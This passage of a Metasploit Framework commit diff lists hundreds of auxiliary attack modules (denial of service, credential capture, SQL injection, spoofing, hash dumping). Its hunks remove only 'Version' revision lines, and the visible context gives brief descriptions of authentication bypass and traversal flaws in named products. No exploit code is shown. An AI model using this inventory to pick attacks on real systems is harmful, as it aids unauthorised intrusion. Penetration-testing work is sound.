modules/auxiliary/admin/vxworks/dlink_i2eye_autoanswer.rb | 1 - modules/auxiliary/admin/vxworks/wdbrpc_memory_dump.rb | 1 - modules/auxiliary/admin/vxworks/wdbrpc_reboot.rb | 1 - modules/auxiliary/admin/webmin/file_disclosure.rb | 1 - modules/auxiliary/admin/zend/java_bridge.rb | 1 - modules/auxiliary/analyze/jtr_aix.rb | 1 - modules/auxiliary/analyze/jtr_crack_fast.rb | 1 - modules/auxiliary/analyze/jtr_linux.rb | 1 - modules/auxiliary/analyze/jtr_mssql_fast.rb | 1 - modules/auxiliary/analyze/jtr_mysql_fast.rb | 1 - modules/auxiliary/analyze/jtr_oracle_fast.rb | 1 - modules/auxiliary/analyze/jtr_unshadow.rb | 1 - modules/auxiliary/analyze/postgres_md5_crack.rb | 1 - modules/auxiliary/bnat/bnat_router.rb | 1 - modules/auxiliary/bnat/bnat_scan.rb | 1 - modules/auxiliary/client/smtp/emailer.rb | 1 - modules/auxiliary/crawler/msfcrawler.rb | 1 - modules/auxiliary/dos/cisco/ios_http_percentpercent.rb | 1 - modules/auxiliary/dos/dhcp/isc_dhcpd_clientid.rb | 1 - modules/auxiliary/dos/freebsd/nfsd/nfsd_mount.rb | 1 - modules/auxiliary/dos/hp/data_protector_rds.rb | 1 - modules/auxiliary/dos/http/3com_superstack_switch.rb | 1 - modules/auxiliary/dos/http/apache_mod_isapi.rb | 1 - modules/auxiliary/dos/http/apache_range_dos.rb | 1 - modules/auxiliary/dos/http/apache_tomcat_transfer_encoding.rb | 1 - modules/auxiliary/dos/http/dell_openmanage_post.rb | 1 - modules/auxiliary/dos/http/hashcollision_dos.rb | 1 - modules/auxiliary/dos/http/sonicwall_ssl_format.rb | 1 - modules/auxiliary/dos/http/webrick_regex.rb | 1 - modules/auxiliary/dos/mdns/avahi_portzero.rb | 1 - modules/auxiliary/dos/ntp/ntpd_reserved_dos.rb | 1 - modules/auxiliary/dos/pptp/ms02_063_pptp_dos.rb | 1 - modules/auxiliary/dos/samba/lsa_addprivs_heap.rb | 1 - modules/auxiliary/dos/samba/lsa_transnames_heap.rb | 1 - modules/auxiliary/dos/scada/beckhoff_twincat.rb | 1 - modules/auxiliary/dos/scada/d20_tftp_overflow.rb | 1 - modules/auxiliary/dos/smtp/sendmail_prescan.rb | 1 - modules/auxiliary/dos/solaris/lpd/cascade_delete.rb | 1 - modules/auxiliary/dos/ssl/dtls_changecipherspec.rb | 1 - modules/auxiliary/dos/syslog/rsyslog_long_tag.rb | 1 - modules/auxiliary/dos/wifi/netgear_ma521_rates.rb | 1 - modules/auxiliary/dos/wifi/netgear_wg311pci.rb | 1 - modules/auxiliary/dos/wifi/probe_resp_null_ssid.rb | 1 - modules/auxiliary/dos/windows/appian/appian_bpm.rb | 1 - modules/auxiliary/dos/windows/browser/ms09_065_eot_integer.rb | 1 - modules/auxiliary/dos/windows/ftp/filezilla_admin_user.rb | 1 - modules/auxiliary/dos/windows/ftp/filezilla_server_port.rb | 1 - modules/auxiliary/dos/windows/ftp/guildftp_cwdlist.rb | 1 - modules/auxiliary/dos/windows/ftp/iis75_ftpd_iac_bof.rb | 1 - modules/auxiliary/dos/windows/ftp/solarftp_user.rb | 1 - modules/auxiliary/dos/windows/ftp/titan626_site.rb | 1 - modules/auxiliary/dos/windows/ftp/vicftps50_list.rb | 1 - modules/auxiliary/dos/windows/ftp/winftp230_nlst.rb | 1 - modules/auxiliary/dos/windows/ftp/xmeasy560_nlst.rb | 1 - modules/auxiliary/dos/windows/ftp/xmeasy570_nlst.rb | 1 - modules/auxiliary/dos/windows/games/kaillera.rb | 1 - modules/auxiliary/dos/windows/http/ms10_065_ii6_asp_dos.rb | 1 - modules/auxiliary/dos/windows/http/pi3web_isapi.rb | 1 - modules/auxiliary/dos/windows/llmnr/ms11_030_dnsapi.rb | 1 - modules/auxiliary/dos/windows/nat/nat_helper.rb | 1 - modules/auxiliary/dos/windows/smb/ms05_047_pnp.rb | 1 - modules/auxiliary/dos/windows/smb/ms06_035_mailslot.rb | 1 - modules/auxiliary/dos/windows/smb/ms06_063_trans.rb | 1 - modules/auxiliary/dos/windows/smb/ms09_001_write.rb | 1 - .../dos/windows/smb/ms09_050_smb2_negotiate_pidhigh.rb | 1 - .../auxiliary/dos/windows/smb/ms09_050_smb2_session_logoff.rb | 1 - modules/auxiliary/dos/windows/smb/rras_vls_null_deref.rb | 1 - modules/auxiliary/dos/windows/smb/vista_negotiate_stop.rb | 1 - modules/auxiliary/dos/windows/smtp/ms06_019_exchange.rb | 1 - modules/auxiliary/dos/windows/tftp/pt360_write.rb | 1 - modules/auxiliary/dos/windows/tftp/solarwinds.rb | 1 - modules/auxiliary/dos/wireshark/chunked.rb | 1 - modules/auxiliary/dos/wireshark/cldap.rb | 1 - modules/auxiliary/dos/wireshark/ldap.rb | 1 - modules/auxiliary/fuzzers/ftp/client_ftp.rb | 1 - modules/auxiliary/fuzzers/http/http_form_field.rb | 1 - modules/auxiliary/fuzzers/smtp/smtp_fuzzer.rb | 1 - modules/auxiliary/gather/android_htmlfileprovider.rb | 2 -- modules/auxiliary/gather/citrix_published_applications.rb | 1 - modules/auxiliary/gather/citrix_published_bruteforce.rb | 1 - modules/auxiliary/gather/d20pass.rb | 1 - modules/auxiliary/gather/enum_dns.rb | 1 - modules/auxiliary/pdf/foxit/authbypass.rb | 1 - modules/auxiliary/scanner/backdoor/energizer_duo_detect.rb | 1 - modules/auxiliary/scanner/db2/db2_auth.rb | 1 - modules/auxiliary/scanner/db2/db2_version.rb | 1 - modules/auxiliary/scanner/db2/discovery.rb | 1 - modules/auxiliary/scanner/dcerpc/endpoint_mapper.rb | 1 - modules/auxiliary/scanner/dcerpc/hidden.rb | 1 - modules/auxiliary/scanner/dcerpc/management.rb | 1 - modules/auxiliary/scanner/dcerpc/tcp_dcerpc_auditor.rb | 1 - modules/auxiliary/scanner/dect/call_scanner.rb | 1 - modules/auxiliary/scanner/dect/station_scanner.rb | 1 - modules/auxiliary/scanner/discovery/arp_sweep.rb | 1 - modules/auxiliary/scanner/discovery/ipv6_multicast_ping.rb | 1 - modules/auxiliary/scanner/discovery/ipv6_neighbor.rb | 1 - .../scanner/discovery/ipv6_neighbor_router_advertisement.rb | 1 - modules/auxiliary/scanner/discovery/udp_probe.rb | 1 - modules/auxiliary/scanner/discovery/udp_sweep.rb | 1 - modules/auxiliary/scanner/emc/alphastor_devicemanager.rb | 1 - modules/auxiliary/scanner/emc/alphastor_librarymanager.rb | 1 - modules/auxiliary/scanner/finger/finger_users.rb | 1 - modules/auxiliary/scanner/ftp/anonymous.rb | 1 - modules/auxiliary/scanner/ftp/ftp_login.rb | 1 - modules/auxiliary/scanner/ftp/ftp_version.rb | 1 - modules/auxiliary/scanner/h323/h323_version.rb | 1 - modules/auxiliary/scanner/http/adobe_xml_inject.rb | 1 - modules/auxiliary/scanner/http/apache_userdir_enum.rb | 1 - modules/auxiliary/scanner/http/atlassian_crowd_fileaccess.rb | 1 - modules/auxiliary/scanner/http/axis_local_file_include.rb | 1 - modules/auxiliary/scanner/http/axis_login.rb | 1 - modules/auxiliary/scanner/http/barracuda_directory_traversal.rb | 1 - modules/auxiliary/scanner/http/cert.rb | 1 - modules/auxiliary/scanner/http/cisco_device_manager.rb | 1 - modules/auxiliary/scanner/http/cisco_ios_auth_bypass.rb | 1 - modules/auxiliary/scanner/http/cisco_nac_manager_traversal.rb | 1 - modules/auxiliary/scanner/http/cold_fusion_version.rb | 1 - modules/auxiliary/scanner/http/coldfusion_locale_traversal.rb | 1 - modules/auxiliary/scanner/http/crawler.rb | 1 - modules/auxiliary/scanner/http/dell_idrac.rb | 1 - modules/auxiliary/scanner/http/frontpage_login.rb | 1 - modules/auxiliary/scanner/http/glassfish_login.rb | 1 - modules/auxiliary/scanner/http/http_login.rb | 1 - modules/auxiliary/scanner/http/http_put.rb | 1 - modules/auxiliary/scanner/http/http_version.rb | 1 - modules/auxiliary/scanner/http/httpbl_lookup.rb | 1 - modules/auxiliary/scanner/http/jboss_vulnscan.rb | 1 - modules/auxiliary/scanner/http/litespeed_source_disclosure.rb | 1 - .../auxiliary/scanner/http/majordomo2_directory_traversal.rb | 1 - .../auxiliary/scanner/http/ms09_020_webdav_unicode_bypass.rb | 1 - modules/auxiliary/scanner/http/nginx_source_disclosure.rb | 1 - modules/auxiliary/scanner/http/open_proxy.rb | 1 - modules/auxiliary/scanner/http/options.rb | 1 - modules/auxiliary/scanner/http/rewrite_proxy_bypass.rb | 1 - modules/auxiliary/scanner/http/robots_txt.rb | 1 - .../auxiliary/scanner/http/sap_businessobjects_user_brute.rb | 1 - .../scanner/http/sap_businessobjects_user_brute_web.rb | 1 - modules/auxiliary/scanner/http/sap_businessobjects_user_enum.rb | 1 - .../auxiliary/scanner/http/sap_businessobjects_version_enum.rb | 1 - modules/auxiliary/scanner/http/scraper.rb | 1 - modules/auxiliary/scanner/http/sqlmap.rb | 1 - modules/auxiliary/scanner/http/squid_pivot_scanning.rb | 1 - modules/auxiliary/scanner/http/squiz_matrix_user_enum.rb | 1 - modules/auxiliary/scanner/http/ssl.rb | 1 - modules/auxiliary/scanner/http/svn_scanner.rb | 1 - modules/auxiliary/scanner/http/tomcat_enum.rb | 1 - modules/auxiliary/scanner/http/tomcat_mgr_login.rb | 1 - modules/auxiliary/scanner/http/trace.rb | 1 - modules/auxiliary/scanner/http/trace_axd.rb | 1 - modules/auxiliary/scanner/http/vmware_server_dir_trav.rb | 2 -- modules/auxiliary/scanner/http/webdav_internal_ip.rb | 1 - modules/auxiliary/scanner/http/webdav_scanner.rb | 1 - modules/auxiliary/scanner/http/webdav_website_content.rb | 1 - modules/auxiliary/scanner/imap/imap_version.rb | 1 - modules/auxiliary/scanner/lotus/lotus_domino_hashes.rb | 1 - modules/auxiliary/scanner/lotus/lotus_domino_login.rb | 1 - modules/auxiliary/scanner/lotus/lotus_domino_version.rb | 1 - modules/auxiliary/scanner/misc/ib_service_mgr_info.rb | 1 - modules/auxiliary/scanner/misc/java_rmi_server.rb | 1 - modules/auxiliary/scanner/misc/redis_server.rb | 1 - modules/auxiliary/scanner/misc/rosewill_rxs3211_passwords.rb | 1 - modules/auxiliary/scanner/misc/sunrpc_portmapper.rb | 1 - modules/auxiliary/scanner/motorola/timbuktu_udp.rb | 1 - modules/auxiliary/scanner/mssql/mssql_hashdump.rb | 1 - modules/auxiliary/scanner/mssql/mssql_login.rb | 1 - modules/auxiliary/scanner/mssql/mssql_ping.rb | 1 - modules/auxiliary/scanner/mysql/mysql_authbypass_hashdump.rb | 1 - modules/auxiliary/scanner/mysql/mysql_hashdump.rb | 1 - modules/auxiliary/scanner/mysql/mysql_schemadump.rb | 1 - modules/auxiliary/scanner/mysql/mysql_version.rb | 1 - modules/auxiliary/scanner/netbios/nbname.rb | 1 - modules/auxiliary/scanner/netbios/nbname_probe.rb | 1 - modules/auxiliary/scanner/nfs/nfsmount.rb | 1 - modules/auxiliary/scanner/ntp/ntp_monlist.rb | 1 - modules/auxiliary/scanner/oracle/emc_sid.rb | 1 - modules/auxiliary/scanner/oracle/isqlplus_login.rb | 1 - modules/auxiliary/scanner/oracle/isqlplus_sidbrute.rb | 1 - modules/auxiliary/scanner/oracle/oracle_hashdump.rb | 1 - modules/auxiliary/scanner/oracle/sid_enum.rb | 1 - modules/auxiliary/scanner/oracle/spy_sid.rb | 1 - modules/auxiliary/scanner/oracle/tnslsnr_version.rb | 1 - modules/auxiliary/scanner/oracle/xdb_sid.rb | 1 - modules/auxiliary/scanner/oracle/xdb_sid_brute.rb | 1 - modules/auxiliary/scanner/pcanywhere/pcanywhere_login.rb | 1 - modules/auxiliary/scanner/pcanywhere/pcanywhere_tcp.rb | 1 - modules/auxiliary/scanner/pcanywhere/pcanywhere_udp.rb | 1 - modules/auxiliary/scanner/pop3/pop3_login.rb | 1 - modules/auxiliary/scanner/pop3/pop3_version.rb | 1 - modules/auxiliary/scanner/portscan/ftpbounce.rb | 1 - modules/auxiliary/scanner/portscan/tcp.rb | 1 - modules/auxiliary/scanner/postgres/postgres_hashdump.rb | 1 - modules/auxiliary/scanner/postgres/postgres_schemadump.rb | 1 - modules/auxiliary/scanner/rogue/rogue_recv.rb | 1 - modules/auxiliary/scanner/rogue/rogue_send.rb | 1 - modules/auxiliary/scanner/rservices/rexec_login.rb | 1 - modules/auxiliary/scanner/rservices/rlogin_login.rb | 1 - modules/auxiliary/scanner/rservices/rsh_login.rb | 1 - modules/auxiliary/scanner/sap/sap_icm_urlscan.rb | 1 - modules/auxiliary/scanner/sap/sap_mgmt_con_abaplog.rb | 1 - modules/auxiliary/scanner/sap/sap_mgmt_con_brute_login.rb | 1 - modules/auxiliary/scanner/sap/sap_mgmt_con_extractusers.rb | 1 - modules/auxiliary/scanner/sap/sap_mgmt_con_getaccesspoints.rb | 1 - modules/auxiliary/scanner/sap/sap_mgmt_con_getenv.rb | 1 - modules/auxiliary/scanner/sap/sap_mgmt_con_getlogfiles.rb | 1 - .../auxiliary/scanner/sap/sap_mgmt_con_getprocessparameter.rb | 1 - .../auxiliary/scanner/sap/sap_mgmt_con_instanceproperties.rb | 1 - modules/auxiliary/scanner/sap/sap_mgmt_con_listlogfiles.rb | 1 - modules/auxiliary/scanner/sap/sap_mgmt_con_startprofile.rb | 1 - modules/auxiliary/scanner/sap/sap_mgmt_con_version.rb | 1 - modules/auxiliary/scanner/scada/digi_addp_reboot.rb | 1 - modules/auxiliary/scanner/scada/digi_addp_version.rb | 1 - modules/auxiliary/scanner/scada/koyo_login.rb | 1 - modules/auxiliary/scanner/sip/enumerator.rb | 1 - modules/auxiliary/scanner/sip/enumerator_tcp.rb | 1 - modules/auxiliary/scanner/sip/options.rb | 1 - modules/auxiliary/scanner/sip/options_tcp.rb | 1 - modules/auxiliary/scanner/sip/sipdroid_ext_enum.rb | 1 - modules/auxiliary/scanner/smb/pipe_auditor.rb | 1 - modules/auxiliary/scanner/smb/pipe_dcerpc_auditor.rb | 1 - modules/auxiliary/scanner/smb/smb2.rb | 1 - modules/auxiliary/scanner/smb/smb_enumshares.rb | 1 - modules/auxiliary/scanner/smb/smb_enumusers.rb | 1 - modules/auxiliary/scanner/smb/smb_enumusers_domain.rb | 1 - modules/auxiliary/scanner/smb/smb_lookupsid.rb | 1 - modules/auxiliary/scanner/smb/smb_version.rb | 1 - modules/auxiliary/scanner/smtp/smtp_enum.rb | 1 - modules/auxiliary/scanner/smtp/smtp_version.rb | 1 - modules/auxiliary/scanner/snmp/aix_version.rb | 1 - modules/auxiliary/scanner/snmp/cisco_config_tftp.rb | 1 - modules/auxiliary/scanner/snmp/cisco_upload_file.rb | 1 - modules/auxiliary/scanner/snmp/snmp_enum.rb | 1 - modules/auxiliary/scanner/snmp/snmp_enumshares.rb | 1 - modules/auxiliary/scanner/snmp/snmp_enumusers.rb | 1 - modules/auxiliary/scanner/snmp/snmp_login.rb | 1 - modules/auxiliary/scanner/snmp/snmp_set.rb | 1 - modules/auxiliary/scanner/snmp/xerox_workcentre_enumusers.rb | 1 - modules/auxiliary/scanner/ssh/ssh_login.rb | 1 - modules/auxiliary/scanner/ssh/ssh_login_pubkey.rb | 1 - modules/auxiliary/scanner/ssh/ssh_version.rb | 1 - modules/auxiliary/scanner/telephony/wardial.rb | 1 - modules/auxiliary/scanner/telnet/lantronix_telnet_version.rb | 1 - modules/auxiliary/scanner/telnet/telnet_encrypt_overflow.rb | 1 - modules/auxiliary/scanner/telnet/telnet_login.rb | 2 +- modules/auxiliary/scanner/telnet/telnet_version.rb | 1 - modules/auxiliary/scanner/tftp/tftpbrute.rb | 1 - modules/auxiliary/scanner/upnp/ssdp_msearch.rb | 1 - modules/auxiliary/scanner/vmware/esx_fingerprint.rb | 1 - modules/auxiliary/scanner/vmware/vmauthd_login.rb | 1 - modules/auxiliary/scanner/vmware/vmauthd_version.rb | 1 - modules/auxiliary/scanner/vmware/vmware_enum_permissions.rb | 1 - modules/auxiliary/scanner/vmware/vmware_enum_sessions.rb | 1 - modules/auxiliary/scanner/vmware/vmware_enum_users.rb | 1 - modules/auxiliary/scanner/vmware/vmware_host_details.rb | 1 - modules/auxiliary/scanner/vmware/vmware_http_login.rb | 1 - modules/auxiliary/scanner/vmware/vmware_screenshot_stealer.rb | 1 - modules/auxiliary/scanner/vnc/vnc_login.rb | 1 - modules/auxiliary/scanner/vnc/vnc_none_auth.rb | 1 - modules/auxiliary/scanner/voice/recorder.rb | 1 - modules/auxiliary/scanner/vxworks/wdbrpc_bootline.rb | 1 - modules/auxiliary/scanner/vxworks/wdbrpc_version.rb | 1 - modules/auxiliary/scanner/winrm/winrm_auth_methods.rb | 1 - modules/auxiliary/scanner/winrm/winrm_login.rb | 1 - modules/auxiliary/scanner/winrm/winrm_wql.rb | 1 - modules/auxiliary/scanner/x11/open_x11.rb | 1 - modules/auxiliary/server/browser_autopwn.rb | 1 - modules/auxiliary/server/capture/drda.rb | 1 - modules/auxiliary/server/capture/ftp.rb | 1 - modules/auxiliary/server/capture/http.rb | 1 - modules/auxiliary/server/capture/http_ntlm.rb | 2 -- modules/auxiliary/server/capture/imap.rb | 1 - modules/auxiliary/server/capture/mysql.rb | 1 - modules/auxiliary/server/capture/pop3.rb | 1 - modules/auxiliary/server/capture/printjob_capture.rb | 1 - modules/auxiliary/server/capture/sip.rb | 1 - modules/auxiliary/server/capture/smb.rb | 1 - modules/auxiliary/server/capture/smtp.rb | 1 - modules/auxiliary/server/capture/telnet.rb | 1 - modules/auxiliary/server/dhcp.rb | 1 - modules/auxiliary/server/dns/spoofhelper.rb | 1 - modules/auxiliary/server/fakedns.rb | 1 - modules/auxiliary/server/ftp.rb | 1 - modules/auxiliary/server/http_ntlmrelay.rb | 1 - modules/auxiliary/server/pxexploit.rb | 1 - modules/auxiliary/server/socks4a.rb | 1 - modules/auxiliary/server/socks_unc.rb | 1 - modules/auxiliary/server/tftp.rb | 1 - modules/auxiliary/server/webkit_xslt_dropper.rb | 1 - modules/auxiliary/sniffer/psnuffle.rb | 1 - modules/auxiliary/spoof/arp/arp_poisoning.rb | 1 - modules/auxiliary/spoof/cisco/dtp.rb | 1 - modules/auxiliary/spoof/dns/bailiwicked_domain.rb | 1 - modules/auxiliary/spoof/dns/bailiwicked_host.rb | 1 - modules/auxiliary/spoof/dns/compare_results.rb | 1 - modules/auxiliary/spoof/nbns/nbns_response.rb | 1 - modules/auxiliary/spoof/replay/pcap_replay.rb | 1 - modules/auxiliary/spoof/wifi/airpwn.rb | 1 - modules/auxiliary/spoof/wifi/dnspwn.rb | 1 - modules/auxiliary/sqli/oracle/dbms_cdc_ipublish.rb | 1 - modules/auxiliary/sqli/oracle/dbms_cdc_publish.rb | 1 - modules/auxiliary/sqli/oracle/dbms_cdc_publish2.rb | 1 - modules/auxiliary/sqli/oracle/dbms_cdc_publish3.rb | 1 - modules/auxiliary/sqli/oracle/dbms_export_extension.rb | 1 - modules/auxiliary/sqli/oracle/dbms_metadata_get_granted_xml.rb | 1 - modules/auxiliary/sqli/oracle/dbms_metadata_get_xml.rb | 1 - modules/auxiliary/sqli/oracle/dbms_metadata_open.rb | 1 - modules/auxiliary/sqli/oracle/droptable_trigger.rb | 1 - modules/auxiliary/sqli/oracle/jvm_os_code_10g.rb | 1 - modules/auxiliary/sqli/oracle/jvm_os_code_11g.rb | 1 - modules/auxiliary/sqli/oracle/lt_compressworkspace.rb | 1 - modules/auxiliary/sqli/oracle/lt_findricset_cursor.rb | 1 - modules/auxiliary/sqli/oracle/lt_mergeworkspace.rb | 1 - modules/auxiliary/sqli/oracle/lt_removeworkspace.rb | 1 - modules/auxiliary/sqli/oracle/lt_rollbackworkspace.rb | 1 - modules/auxiliary/vsploit/malware/dns/dns_mariposa.rb | 1 - modules/auxiliary/vsploit/malware/dns/dns_query.rb | 1 - modules/auxiliary/vsploit/malware/dns/dns_zeus.rb | 1 - modules/auxiliary/vsploit/pii/web_pii.rb | 1 - 370 files changed, 1 insertion(+), 373 deletions(-) diff --git a/modules/auxiliary/admin/2wire/xslt_password_reset.rb b/modules/auxiliary/admin/2wire/xslt_password_reset.rb index e10d8c59b5..4b33085ce0 100644 --- a/modules/auxiliary/admin/2wire/xslt_password_reset.rb +++ b/modules/auxiliary/admin/2wire/xslt_password_reset.rb @@ -20,7 +20,6 @@ class Metasploit3 < Msf::Auxiliary configuration changes (such as resetting the password) as administrators. }, 'License' => MSF_LICENSE, - 'Version' => "$Revision$", 'Author' => [ 'hkm [at] hakim.ws', #Initial discovery, poc diff --git a/modules/auxiliary/admin/backupexec/dump.rb b/modules/auxiliary/admin/backupexec/dump.rb index 263f4ca58b..b76e345dcf 100644 --- a/modules/auxiliary/admin/backupexec/dump.rb +++ b/modules/auxiliary/admin/backupexec/dump.rb @@ -26,7 +26,6 @@ class Metasploit3 < Msf::Auxiliary }, 'Author' => [ 'hdm', 'Unknown' ], 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ ['CVE', '2005-2611'], diff --git a/modules/auxiliary/admin/backupexec/registry.rb b/modules/auxiliary/admin/backupexec/registry.rb index cdcaa258c0..042bf8cdf8 100644 --- a/modules/auxiliary/admin/backupexec/registry.rb +++ b/modules/auxiliary/admin/backupexec/registry.rb @@ -26,7 +26,6 @@ class Metasploit3 < Msf::Auxiliary }, 'Author' => [ 'hdm' ], 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ [ 'OSVDB', '17627' ], diff --git a/modules/auxiliary/admin/cisco/cisco_secure_acs_bypass.rb b/modules/auxiliary/admin/cisco/cisco_secure_acs_bypass.rb index 95e1613665..7333067af6 100644 --- a/modules/auxiliary/admin/cisco/cisco_secure_acs_bypass.rb +++ b/modules/auxiliary/admin/cisco/cisco_secure_acs_bypass.rb @@ -16,7 +16,6 @@ class Metasploit4 < Msf::Auxiliary def initialize(info = {}) super(update_info(info, 'Name' => 'Cisco Secure ACS Version < 5.1.0.44.5 or 5.2.0.26.2 Unauthorized Password Change', - 'Version' => '$Revision$', 'Description' => %q{ This module exploits an authentication bypass issue which allows arbitrary password change requests to be issued for any user in the local store. diff --git a/modules/auxiliary/admin/cisco/vpn_3000_ftp_bypass.rb b/modules/auxiliary/admin/cisco/vpn_3000_ftp_bypass.rb index ea4322fa33..b0890ea45e 100644 --- a/modules/auxiliary/admin/cisco/vpn_3000_ftp_bypass.rb +++ b/modules/auxiliary/admin/cisco/vpn_3000_ftp_bypass.rb @@ -26,7 +26,6 @@ class Metasploit3 < Msf::Auxiliary }, 'Author' => [ 'patrick' ], 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ [ 'BID', '19680' ], diff --git a/modules/auxiliary/admin/db2/db2rcmd.rb b/modules/auxiliary/admin/db2/db2rcmd.rb index 609cf21d23..eb31630122 100644 --- a/modules/auxiliary/admin/db2/db2rcmd.rb +++ b/modules/auxiliary/admin/db2/db2rcmd.rb @@ -22,7 +22,6 @@ class Metasploit3 < Msf::Auxiliary }, 'Author' => [ 'MC' ], 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2004-0795' ], diff --git a/modules/auxiliary/admin/emc/alphastor_devicemanager_exec.rb b/modules/auxiliary/admin/emc/alphastor_devicemanager_exec.rb index fdca984d35..b26da0d33d 100644 --- a/modules/auxiliary/admin/emc/alphastor_devicemanager_exec.rb +++ b/modules/auxiliary/admin/emc/alphastor_devicemanager_exec.rb @@ -21,7 +21,6 @@ class Metasploit3 < Msf::Auxiliary }, 'Author' => [ 'MC' ], 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ [ 'URL', 'http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=703' ], diff --git a/modules/auxiliary/admin/emc/alphastor_librarymanager_exec.rb b/modules/auxiliary/admin/emc/alphastor_librarymanager_exec.rb index 81baa368a1..d83dcec60c 100644 --- a/modules/auxiliary/admin/emc/alphastor_librarymanager_exec.rb +++ b/modules/auxiliary/admin/emc/alphastor_librarymanager_exec.rb @@ -21,7 +21,6 @@ class Metasploit3 < Msf::Auxiliary }, 'Author' => [ 'MC' ], 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ [ 'URL', 'http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=703' ], diff --git a/modules/auxiliary/admin/ftp/titanftp_xcrc_traversal.rb b/modules/auxiliary/admin/ftp/titanftp_xcrc_traversal.rb index 54346a1ca7..476ccc65f2 100644 --- a/modules/auxiliary/admin/ftp/titanftp_xcrc_traversal.rb +++ b/modules/auxiliary/admin/ftp/titanftp_xcrc_traversal.rb @@ -30,7 +30,6 @@ class Metasploit3 < Msf::Auxiliary }, 'Author' => 'jduck', 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ [ 'OSVDB', '65533'], diff --git a/modules/auxiliary/admin/http/contentkeeper_fileaccess.rb b/modules/auxiliary/admin/http/contentkeeper_fileaccess.rb index 2d91ae1abd..ab94edb661 100644 --- a/modules/auxiliary/admin/http/contentkeeper_fileaccess.rb +++ b/modules/auxiliary/admin/http/contentkeeper_fileaccess.rb @@ -15,7 +15,6 @@ class Metasploit3 < Msf::Auxiliary def initialize super( 'Name' => 'ContentKeeper Web Appliance mimencode File Access', - 'Version' => '$Revision$', 'Description' => %q{ This module abuses the 'mimencode' binary present within ContentKeeper Web filtering appliances to retrieve arbitrary diff --git a/modules/auxiliary/admin/http/hp_web_jetadmin_exec.rb b/modules/auxiliary/admin/http/hp_web_jetadmin_exec.rb index 8e65ba21b2..4d4cd801b1 100644 --- a/modules/auxiliary/admin/http/hp_web_jetadmin_exec.rb +++ b/modules/auxiliary/admin/http/hp_web_jetadmin_exec.rb @@ -26,7 +26,6 @@ class Metasploit3 < Msf::Auxiliary }, 'Author' => [ 'patrick' ], 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ [ 'OSVDB', '5798' ], diff --git a/modules/auxiliary/admin/http/iomega_storcenterpro_sessionid.rb b/modules/auxiliary/admin/http/iomega_storcenterpro_sessionid.rb index f7e17f2145..cfeb05caa3 100644 --- a/modules/auxiliary/admin/http/iomega_storcenterpro_sessionid.rb +++ b/modules/auxiliary/admin/http/iomega_storcenterpro_sessionid.rb @@ -15,7 +15,6 @@ class Metasploit3 < Msf::Auxiliary def initialize super( 'Name' => 'Iomega StorCenter Pro NAS Web Authentication Bypass', - 'Version' => '$Revision$', 'Description' => %q{ The Iomega StorCenter Pro Network Attached Storage device web interface increments sessions IDs, allowing for simple brute force attacks to bypass authentication and gain administrative diff --git a/modules/auxiliary/admin/http/tomcat_administration.rb b/modules/auxiliary/admin/http/tomcat_administration.rb index ec1fa3fcad..a7b491a9fc 100644 --- a/modules/auxiliary/admin/http/tomcat_administration.rb +++ b/modules/auxiliary/admin/http/tomcat_administration.rb @@ -16,7 +16,6 @@ class Metasploit3 < Msf::Auxiliary def initialize super( 'Name' => 'Tomcat Administration Tool Default Access', - 'Version' => '$Revision$', 'Description' => 'Detect the Tomcat administration interface.', 'References' => [ diff --git a/modules/auxiliary/admin/http/tomcat_utf8_traversal.rb b/modules/auxiliary/admin/http/tomcat_utf8_traversal.rb index 1ddf6fc5ef..c274b87aa8 100644 --- a/modules/auxiliary/admin/http/tomcat_utf8_traversal.rb +++ b/modules/auxiliary/admin/http/tomcat_utf8_traversal.rb @@ -16,7 +16,6 @@ class Metasploit3 < Msf::Auxiliary def initialize super( 'Name' => 'Tomcat UTF-8 Directory Traversal Vulnerability', - 'Version' => '$Revision$', 'Description' => %q{ This module tests whether a directory traversal vulnerablity is present in versions of Apache Tomcat 4.1.0 - 4.1.37, 5.5.0 - 5.5.26 and 6.0.0 diff --git a/modules/auxiliary/admin/http/trendmicro_dlp_traversal.rb b/modules/auxiliary/admin/http/trendmicro_dlp_traversal.rb index 144d02fd86..831efcdb24 100644 --- a/modules/auxiliary/admin/http/trendmicro_dlp_traversal.rb +++ b/modules/auxiliary/admin/http/trendmicro_dlp_traversal.rb @@ -15,7 +15,6 @@ class Metasploit3 < Msf::Auxiliary def initialize super( 'Name' => 'TrendMicro Data Loss Prevention 5.5 Directory Traversal', - 'Version' => '$Revision$', 'Description' => %q{ This module tests whether a directory traversal vulnerablity is present in Trend Micro DLP (Data Loss Prevention) Appliance v5.5 build <= 1294. diff --git a/modules/auxiliary/admin/http/typo3_sa_2009_001.rb b/modules/auxiliary/admin/http/typo3_sa_2009_001.rb index 3a80950663..b1c6aa786c 100644 --- a/modules/auxiliary/admin/http/typo3_sa_2009_001.rb +++ b/modules/auxiliary/admin/http/typo3_sa_2009_001.rb @@ -15,7 +15,6 @@ class Metasploit4 < Msf::Auxiliary def initialize super( 'Name' => 'TYPO3 sa-2009-001 Weak Encryption Key File Disclosure', - 'Version' => '$Revision$', 'Description' => %q{ This module exploits a flaw in TYPO3 encryption ey creation process to allow for file disclosure in the jumpUrl mechanism. This flaw can be used to read any file diff --git a/modules/auxiliary/admin/http/typo3_sa_2009_002.rb b/modules/auxiliary/admin/http/typo3_sa_2009_002.rb index 0535c9b7dd..948a3e673d 100644 --- a/modules/auxiliary/admin/http/typo3_sa_2009_002.rb +++ b/modules/auxiliary/admin/http/typo3_sa_2009_002.rb @@ -22,7 +22,6 @@ class Metasploit3 < Msf::Auxiliary }, 'Author' => [ 'spinbad ' ], 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ ['OSVDB', '52048'], diff --git a/modules/auxiliary/admin/http/typo3_sa_2010_020.rb b/modules/auxiliary/admin/http/typo3_sa_2010_020.rb index f8f587bf70..993d4f4f0f 100644 --- a/modules/auxiliary/admin/http/typo3_sa_2010_020.rb +++ b/modules/auxiliary/admin/http/typo3_sa_2010_020.rb @@ -16,7 +16,6 